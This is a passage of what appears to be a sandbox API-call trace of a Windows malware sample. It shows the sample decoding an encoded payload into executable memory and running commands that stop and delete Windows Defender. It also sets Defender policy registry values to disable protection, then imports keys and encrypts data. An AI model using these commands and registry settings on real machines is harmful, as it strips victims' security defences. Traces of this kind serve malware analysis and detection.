pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0020.566] CryptStringToBinaryA (in: pszString="D9un1aHrRVJB4X2hBLIirwfdnltQS9eJZ4MXpWz+PNRUqT7XUJIf0jmSCOwrlAToXb8RugO9E7NnnBXMZosqzXyHKbEdknrlF5Bw3zaWDthNqQDmL6p9zCD5Ks0y8xHtPI0R9QODF/hC/jzuW6k+7VmSH+wnkgjSRZQE+G6/EaoGvROjJpwV3CCLKt0nhymhGJJ69ReQcM8blg7IIakAzy2qfec7+SrkNfMR+lCNEYkCgxeECf48klKpPpFWkh+YO5IIpjyUBKY49AG/PYQD4d0fvMYR+T+6B5XlfYnZcvsq3WC4CK8ejMQqmd8EqGjyGc8+hAPt3R+wwAFF5hCSyin48hk3bDNqvBmWOgs8TX9FUso59PIWbz8RVsoBhtkO5MYiiTTKPT4f3WrH8BP5W+0YX98Yo8gWS3SxPPgw2Db+Xp1yUwb4ZiJN2wyQC6sytjqPvTky0RW/Ms6vRDTIKcx243KbdOFg/GGaNhNC2ACmKqwQ8hmT5C9XJd3PLLSrsuTALr6TxylbiCKPPfx80QXn3whnRhZLeGh243KbEJ8d3w/8wBH9bAFYTTzHLLS8q3e9lN8XnMqVzW9FUsghqPIB8+Q+5jYWctkOhLI6ldmkMfu1mPOjt5r5mJach5iBOs6+woAwKgJo/+vGpcTKwNvE3f/VwtH8UP8DMm/rxqXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+s+vRpXUKNOTW9F2wSUUIPfC28T3ntZWrhDVE1vzBe9hY15VD868LpmAg0BL6t4X0VSQTSzOVi0J3fdJN8bYCFWxhJNBRGEY3lUP+q7IjHfkLus3wx3FdkZUDu632cXIwY2jNEbV98eT84JZW/weoQ8t/BkbQRZoCFVshpJBKlPOHlUuq8PXraWXtOIVqaMHWGTCrNqld1teJw2VQMPFQ/GihiQSWxt8rhuPCll/GeBY5nfCGfPQsGmWHqO7ox4EyXeUtSCtKNchdkMYAOgID4vIQ1s378NiVhN5ABayiHA8Fy0OnfdcKjTUhQKFuSgD4Kg9LWY86O3mvmYlpw=", cchString=0x42c, dwFlags=0x1, pbBinary=0x1244c98, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1244c98, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0020.567] VirtualAlloc (lpAddress=0x0, dwSize=0x1410, flAllocationType=0x1000, flProtect=0x40) returned 0x150000
	[0020.567] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76b10000
	[0020.567] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x774c0000
	[0022.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75bb0000
	[0024.411] GetProcAddress (hModule=0x76b10000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x76b98bc9
	[0024.411] GetProcAddress (hModule=0x774c0000, lpProcName="RegCloseKey") returned 0x774d469d
	[0024.411] GetProcAddress (hModule=0x774c0000, lpProcName="RegCreateKeyW") returned 0x774d1514
	[0024.411] GetProcAddress (hModule=0x774c0000, lpProcName="RegOpenKeyExW") returned 0x774d468d
	[0024.411] GetProcAddress (hModule=0x774c0000, lpProcName="RegSetValueExW") returned 0x774d14d6
	[0024.411] GetProcAddress (hModule=0x75bb0000, lpProcName="ShellExecuteA") returned 0x75df7078
	[0024.412] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 0
	[0024.412] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0024.567] GetKeyState (nVirtKey=144) returned 1
	[0024.567] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0024.567] GetAsyncKeyState (vKey=37) returned 0
	[0024.567] GetAsyncKeyState (vKey=39) returned 0
	[0024.567] GetAsyncKeyState (vKey=32) returned 0
	[0024.567] GetAsyncKeyState (vKey=13) returned 0
	[0024.567] GetAsyncKeyState (vKey=100) returned 0
	[0024.567] GetAsyncKeyState (vKey=102) returned 0
	[0024.567] GetAsyncKeyState (vKey=107) returned 0
	[0024.567] GetAsyncKeyState (vKey=109) returned 0
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.567] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.568] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.569] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.570] GetTickCount () returned 0xa5fcc8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.571] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.572] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.573] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetTickCount () returned 0xa5fcd8
	[0024.574] GetKeyState (nVirtKey=144) returned 1
	[0024.574] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.086] GetKeyState (nVirtKey=144) returned 1
	[0025.086] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.086] GetAsyncKeyState (vKey=37) returned 0
	[0025.086] GetAsyncKeyState (vKey=39) returned 0
	[0025.086] GetAsyncKeyState (vKey=32) returned 0
	[0025.086] GetAsyncKeyState (vKey=13) returned 0
	[0025.086] GetAsyncKeyState (vKey=100) returned 0
	[0025.086] GetAsyncKeyState (vKey=102) returned 0
	[0025.086] GetAsyncKeyState (vKey=107) returned 0
	[0025.086] GetAsyncKeyState (vKey=109) returned 0
	[0025.166] GetKeyState (nVirtKey=144) returned 1
	[0025.166] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.179] GetKeyState (nVirtKey=144) returned 1
	[0025.179] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.248] GetKeyState (nVirtKey=144) returned 1
	[0025.248] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.257] GetAsyncKeyState (vKey=37) returned 0
	[0025.257] GetAsyncKeyState (vKey=39) returned 0
	[0025.257] GetAsyncKeyState (vKey=32) returned 0
	[0025.257] GetAsyncKeyState (vKey=13) returned 0
	[0025.257] GetAsyncKeyState (vKey=100) returned 0
	[0025.257] GetAsyncKeyState (vKey=102) returned 0
	[0025.257] GetAsyncKeyState (vKey=107) returned 0
	[0025.257] GetAsyncKeyState (vKey=109) returned 0
	[0025.257] GetKeyState (nVirtKey=144) returned 1
	[0025.257] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.533] GetKeyState (nVirtKey=144) returned 1
	[0025.533] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.538] GetKeyState (nVirtKey=144) returned 1
	[0025.538] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.892] GetKeyState (nVirtKey=144) returned 1
	[0025.892] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.897] GetAsyncKeyState (vKey=37) returned 0
	[0025.897] GetAsyncKeyState (vKey=39) returned 0
	[0025.897] GetAsyncKeyState (vKey=32) returned 0
	[0025.897] GetAsyncKeyState (vKey=13) returned 0
	[0025.897] GetAsyncKeyState (vKey=100) returned 0
	[0025.897] GetAsyncKeyState (vKey=102) returned 0
	[0025.897] GetAsyncKeyState (vKey=107) returned 0
	[0025.897] GetAsyncKeyState (vKey=109) returned 0
	[0025.897] GetKeyState (nVirtKey=144) returned 1
	[0025.897] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.913] GetKeyState (nVirtKey=144) returned 1
	[0025.913] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.928] GetKeyState (nVirtKey=144) returned 1
	[0025.928] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.945] GetKeyState (nVirtKey=144) returned 1
	[0025.945] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.959] GetAsyncKeyState (vKey=37) returned 0
	[0025.959] GetAsyncKeyState (vKey=39) returned 0
	[0025.959] GetAsyncKeyState (vKey=32) returned 0
	[0025.959] GetAsyncKeyState (vKey=13) returned 0
	[0025.959] GetAsyncKeyState (vKey=100) returned 0
	[0025.959] GetAsyncKeyState (vKey=102) returned 0
	[0025.959] GetAsyncKeyState (vKey=107) returned 0
	[0025.959] GetAsyncKeyState (vKey=109) returned 0
	[0025.960] GetKeyState (nVirtKey=144) returned 1
	[0025.960] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0025.975] GetKeyState (nVirtKey=144) returned 1
	[0025.975] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.005] GetKeyState (nVirtKey=144) returned 1
	[0026.005] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.007] GetKeyState (nVirtKey=144) returned 1
	[0026.007] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.027] GetAsyncKeyState (vKey=37) returned 0
	[0026.027] GetAsyncKeyState (vKey=39) returned 0
	[0026.027] GetAsyncKeyState (vKey=32) returned 0
	[0026.027] GetAsyncKeyState (vKey=13) returned 0
	[0026.027] GetAsyncKeyState (vKey=100) returned 0
	[0026.027] GetAsyncKeyState (vKey=102) returned 0
	[0026.027] GetAsyncKeyState (vKey=107) returned 0
	[0026.027] GetAsyncKeyState (vKey=109) returned 0
	[0026.027] GetKeyState (nVirtKey=144) returned 1
	[0026.027] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.038] GetKeyState (nVirtKey=144) returned 1
	[0026.038] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.053] GetKeyState (nVirtKey=144) returned 1
	[0026.053] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.099] GetAsyncKeyState (vKey=37) returned 0
	[0026.099] GetAsyncKeyState (vKey=39) returned 0
	[0026.099] GetAsyncKeyState (vKey=32) returned 0
	[0026.099] GetAsyncKeyState (vKey=13) returned 0
	[0026.099] GetAsyncKeyState (vKey=100) returned 0
	[0026.099] GetAsyncKeyState (vKey=102) returned 0
	[0026.099] GetAsyncKeyState (vKey=107) returned 0
	[0026.099] GetAsyncKeyState (vKey=109) returned 0
	[0026.102] GetKeyState (nVirtKey=144) returned 1
	[0026.102] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.116] GetKeyState (nVirtKey=144) returned 1
	[0026.116] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.133] GetKeyState (nVirtKey=144) returned 1
	[0026.133] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.148] GetAsyncKeyState (vKey=37) returned 0
	[0026.148] GetAsyncKeyState (vKey=39) returned 0
	[0026.148] GetAsyncKeyState (vKey=32) returned 0
	[0026.148] GetAsyncKeyState (vKey=13) returned 0
	[0026.148] GetAsyncKeyState (vKey=100) returned 0
	[0026.148] GetAsyncKeyState (vKey=102) returned 0
	[0026.148] GetAsyncKeyState (vKey=107) returned 0
	[0026.148] GetAsyncKeyState (vKey=109) returned 0
	[0026.148] GetKeyState (nVirtKey=144) returned 1
	[0026.148] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.160] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/c sc stop WinDefend", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0026.404] GetKeyState (nVirtKey=144) returned 1
	[0026.404] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.413] GetAsyncKeyState (vKey=37) returned 0
	[0026.413] GetAsyncKeyState (vKey=39) returned 0
	[0026.413] GetAsyncKeyState (vKey=32) returned 0
	[0026.413] GetAsyncKeyState (vKey=13) returned 0
	[0026.413] GetAsyncKeyState (vKey=100) returned 0
	[0026.414] GetAsyncKeyState (vKey=102) returned 0
	[0026.414] GetAsyncKeyState (vKey=107) returned 0
	[0026.414] GetAsyncKeyState (vKey=109) returned 0
	[0026.414] GetKeyState (nVirtKey=144) returned 1
	[0026.414] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.427] GetKeyState (nVirtKey=144) returned 1
	[0026.427] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.437] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/c sc delete WinDefend", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0026.476] GetKeyState (nVirtKey=144) returned 1
	[0026.476] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.476] GetAsyncKeyState (vKey=37) returned 0
	[0026.476] GetAsyncKeyState (vKey=39) returned 0
	[0026.476] GetAsyncKeyState (vKey=32) returned 0
	[0026.476] GetAsyncKeyState (vKey=13) returned 0
	[0026.476] GetAsyncKeyState (vKey=100) returned 0
	[0026.476] GetAsyncKeyState (vKey=102) returned 0
	[0026.476] GetAsyncKeyState (vKey=107) returned 0
	[0026.476] GetAsyncKeyState (vKey=109) returned 0
	[0026.489] GetKeyState (nVirtKey=144) returned 1
	[0026.489] InvalidateRect (hWnd=0x30132, lpRect=0x0, bErase=0) returned 1
	[0026.502] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2, phkResult=0x12fe28 | out: phkResult=0x12fe28*=0x0) returned 0x2
	[0026.502] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", phkResult=0x12fe28 | out: phkResult=0x12fe28*=0x0) returned 0x5
	[0026.502] RegSetValueExW (hKey=0x0, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x12fe20, cbData=0x4) returned 0x6
	[0026.503] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2, phkResult=0x12fe28 | out: phkResult=0x12fe28*=0x0) returned 0x2
	[0026.503] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", phkResult=0x12fe28 | out: phkResult=0x12fe28*=0x0) returned 0x5
	[0026.503] RegSetValueExW (hKey=0x0, lpValueName="DisableBehaviorMonitoring", Reserved=0x0, dwType=0x4, lpData=0x12fe20, cbData=0x4) returned 0x6
	[0026.503] RegSetValueExW (hKey=0x0, lpValueName="DisableOnAccessProtection", Reserved=0x0, dwType=0x4, lpData=0x12fe20, cbData=0x4) returned 0x6
	[0026.503] RegSetValueExW (hKey=0x0, lpValueName="DisableOnRealtimeEnable", Reserved=0x0, dwType=0x4, lpData=0x12fe20, cbData=0x4) returned 0x6
	[0026.503] RegSetValueExW (hKey=0x0, lpValueName="DisableIOAVProtection", Reserved=0x0, dwType=0x4, lpData=0x12fe20, cbData=0x4) returned 0x6
	[0026.503] RegCloseKey (hKey=0x0) returned 0x6
	[0026.503] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 0
	[0026.503] Sleep (dwMilliseconds=0x3) 
	[0026.506] VirtualAlloc (lpAddress=0x0, dwSize=0xef0, flAllocationType=0x1000, flProtect=0x40) returned 0x3c0000
	[0026.506] VirtualAlloc (lpAddress=0x0, dwSize=0x320, flAllocationType=0x1000, flProtect=0x40) returned 0x450000
	[0026.506] ShowWindow (hWnd=0x30132, nCmdShow=0) returned 0
	[0026.507] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x774c0000
	[0026.510] GetProcAddress (hModule=0x774c0000, lpProcName="CryptAcquireContextA") returned 0x774c91dd
	[0026.510] GetProcAddress (hModule=0x774c0000, lpProcName="CryptImportKey") returned 0x774cc532
	[0026.510] GetProcAddress (hModule=0x774c0000, lpProcName="CryptEncrypt") returned 0x774e779b
	[0026.510] CryptAcquireContextA (in: phProv=0x12fd78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x12fd78*=0x1a1eb8) returned 1
	[0026.936] CryptImportKey (in: hProv=0x1a1eb8, pbData=0x12fc2c, dwDataLen=0x134, hPubKey=0x0, dwFlags=0x0, phKey=0x12fc24 | out: phKey=0x12fc24*=0x1b4c10) returned 1
	[0027.011] CryptImportKey (in: hProv=0x1a1eb8, pbData=0x12fdc4, dwDataLen=0x4c, hPubKey=0x1b4c10, dwFlags=0x0, phKey=0x12fe18 | out: phKey=0x12fe18*=0x1b4c50) returned 1
	[0027.013] CryptEncrypt (in: hKey=0x1b4c50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x40e148*, pdwDataLen=0x12ff00*=0x28800, dwBufLen=0x28800 | out: pbData=0x40e148*, pdwDataLen=0x12ff00*=0x28800) returned 1
	[0027.020] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76b10000
	[0027.020] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77330000
